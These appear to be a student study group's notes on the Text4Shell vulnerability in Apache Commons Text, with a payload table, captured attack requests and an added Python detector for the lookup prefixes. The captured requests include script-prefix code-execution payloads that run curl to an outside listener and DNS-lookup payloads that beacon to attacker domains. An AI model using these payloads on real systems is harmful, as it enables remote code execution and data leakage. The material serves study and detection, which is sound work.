This week we discussed what kind of material we should produce as the deliverable for the presentation seminar that takes place after exam week.
-> Decided to write it up and organize it in report form.
We also went back over the activities from the previous sessions and reviewed the vulnerability once more.
The inside of the text4shell code we examined last time looks like the following.
Alongside the attack code examples we looked at last time, we also brought in more example payloads.
| Attack | Prefix | Example attack code |
|---|---|---|
| Remote code execution | script | `${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}` `${script:JEXL:''.getClass().forName('java.lang.Runtime').getRuntime().exec('touch /tmp/pwned')}` |
| Sending information through DNS queries to malicious domains | dns | `${dns:address\|commons.apache.org}` |
| Disclosure of internal network information via HTTP (HTTPS) requests | url | `${url:UTF-8:https://nvd.nist.gov/vuln/detail/CVE-2022-42889}` |
Further details on each prefix are as follows.
DNS prefix:
${dns:address:<victimdomain>.<unique identifier>.<listenerdomain>}
Example request:
GET / HTTP/1.1
X-Forwarded-For: 13.53.121.211
Host:<redacted>
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: ${dns:address|<redacted>.acc.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Accept-Encoding: ${dns:address|<redacted>.accenc.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Accept-Language: ${dns:address|<redacted>.acclang.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Access-Control-Request-Headers: ${dns:address|<redacted>.acrh.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Access-Control-Request-Method: ${dns:address|<redacted>.acrm.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Authentication: Bearer ${dns:address|<redacted>.authb2.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Cookie: %5Bredacted%5D=%5Bredacted%5D;
Location: ${dns:address|<redacted>.loc.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Origin: ${dns:address|<redacted>.orig.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Referer: ${dns:address|<redacted>.ref.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
Upgrade-Insecure-Requests: ${dns:address|<redacted>.uir.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Api-Version: ${dns:address|<redacted>.xapi.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Csrf-Token: ${dns:address|<redacted>.csrf.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Druid-Comment: ${dns:address|<redacted>.druid.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Origin: ${dns:address|<redacted>.xorig.cd77aqg40oum8ui7khqgkwwu1xpqt4h5k.tress.cf}
X-Vismaservice: VSP
Script prefix:
${script:javascript:<rce payload>}
Example request:
GET /?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27curl+<redacted>.uri.cd85mppufkgpgd800010cex5ohoqkutab.oast.online%27%29%7D HTTP/1.1
Accept-Encoding: gzip
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Host:<redacted>
Url prefix:
${url:UTF-8:<listenerdomain>/<endpoint>}
Example request:
GET /wp-json/wp/v2/comments?post=%24%7Burl%3AUTF-8%3Ahttp%3A%2F%2Fcanarytokens.com%2Ffeedback%2Fu1mcjpc0ti4po7ukgntl9l7jh%2Fcontact.php%7D HTTP/1.1
X-Forwarded-For: 199.16.53.138
Accept-Encoding: gzip
User-Agent: Fuzz Faster U Fool v1.5.0-dev
Host: <redacted>
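The three prefixes above all arrive inside ordinary HTTP request lines and headers, usually percent-encoded, so a defender's first step is to decode each line and look for `${script:`, `${dns:` or `${url:` lookups. The following Python detector is an added example for these notes, not code from the original post or from Apache Commons Text; the prefix list is taken from the table above, and the sample requests are constructed (condensed from the example requests shown, with `listener.example` and `example.invalid` as placeholder hosts).

```python
"""Scan raw HTTP requests for Text4Shell-style interpolation payloads.

Added example: decodes each request line / header (repeatedly, to catch
double encoding) and reports every ${script:...}, ${dns:...} or ${url:...}
lookup together with where it was found.
"""
import re
from urllib.parse import unquote

# Lookup prefixes from the table above. Assumption: these three are the ones
# worth alerting on; the list can be extended if more lookups are in scope.
DANGEROUS_PREFIXES = ("script", "dns", "url")

# "${" + optional whitespace + dangerous prefix + ":"; StringSubstitutor
# resolves lookup keys case-insensitively, so the regex is too.
PATTERN = re.compile(
    r"\$\{\s*(" + "|".join(DANGEROUS_PREFIXES) + r")\s*:", re.IGNORECASE
)
# Request line such as "GET /path HTTP/1.1".
REQUEST_LINE = re.compile(r"^[A-Z]+ \S+ HTTP/\d(\.\d)?$")


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads such as
    %2524%257B are normalised before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def extract_expression(text, start):
    """Return the ${...} expression starting at `start`, honouring nested
    braces; if the closing brace is missing, return the rest of the line."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]


def scan_request(raw_request):
    """Return one finding per matched lookup: the location (request-line or
    header name), the prefix in lower case, and the decoded expression."""
    findings = []
    for line in raw_request.splitlines():
        if not line.strip():
            continue
        if REQUEST_LINE.match(line):
            location = "request-line"
        else:
            location = line.split(":", 1)[0].strip() or "unknown"
        decoded = decode_fully(line)
        for match in PATTERN.finditer(decoded):
            findings.append({
                "location": location,
                "prefix": match.group(1).lower(),
                "expression": extract_expression(decoded, match.start()),
            })
    return findings


# Constructed sample requests (placeholder hosts), condensed from the examples above.
DNS_REQUEST = (
    "GET / HTTP/1.1\n"
    "Host: example.invalid\n"
    "Accept: ${dns:address|victim.acc.listener.example}\n"
    "Accept-Language: ${dns:address|victim.acclang.listener.example}\n"
    "Authentication: Bearer ${dns:address|victim.authb2.listener.example}\n"
    "Cookie: session=abc\n"
)
SCRIPT_REQUEST = (
    "GET /?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime"
    "%28%29.exec%28%27curl+listener.example%27%29%7D HTTP/1.1\n"
    "Host: example.invalid\n"
)
URL_REQUEST = (
    "GET /wp-json/wp/v2/comments?post=%24%7Burl%3AUTF-8%3Ahttp%3A%2F%2F"
    "listener.example%2Fping%7D HTTP/1.1\n"
    "Host: example.invalid\n"
)
DOUBLE_ENCODED_REQUEST = (
    "GET / HTTP/1.1\n"
    "X-Api-Version: %2524%257Bdns%253Aaddress%257Clistener.example%257D\n"
)
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\n"
    "Host: example.invalid\n"
    "X-Template: ${user.name}\n"   # "${" alone is not enough to alert
)

if __name__ == "__main__":
    for name, req in [("dns", DNS_REQUEST), ("script", SCRIPT_REQUEST),
                      ("url", URL_REQUEST), ("double", DOUBLE_ENCODED_REQUEST),
                      ("benign", BENIGN_REQUEST)]:
        for f in scan_request(req):
            print(name, f["location"], f["prefix"], f["expression"])
```

Matching only on the dangerous prefixes (rather than any `${`) keeps false positives down on applications that legitimately pass template-looking strings, and decoding before matching is what catches the percent-encoded query strings seen in the script and url examples above.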
Source: